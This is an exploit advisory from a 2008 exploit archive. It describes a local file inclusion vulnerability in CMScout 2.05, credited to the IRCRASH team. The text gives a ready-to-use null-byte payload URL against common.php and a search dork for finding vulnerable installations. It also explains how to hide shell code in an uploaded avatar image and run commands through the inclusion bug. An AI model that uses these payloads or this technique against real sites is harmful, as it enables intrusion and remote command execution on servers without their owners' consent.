[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability
# Published : 2008-07-27
# Author : IRCRASH
# Previous Title : ViArt Shop <= 3.5 (category_id) Remote SQL Injection Vulnerability
# Next Title : Getacoder clone (sb_protype) Remote SQL Injection Vulnerability
#####################################################################################
#### CMScout 2.05 LFI ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm) #
#Discovered by : IRCRASH (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm #
#####################################################################################
# #
#Script Download : www.cmscout.co.za #
# #
#DORK : "Powered by CMScout ??2005 CMScout Group" #
# #
#####################################################################################
# [Lfi] #
#http://Example/common.php?bit=file.type%00 #
# #
#Note : You can mix a shell code and image then upload this image as your avatar and load it by this bug,your avatars save in /avatars folder ;)
#Ex. http://Example/common.php?bit=avatars/0254d5d7v15d_sd5e5550053.jpg%00&cmd=ls #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
################################ TNX GOD ############################################
# www.Syue.com [2008-07-27]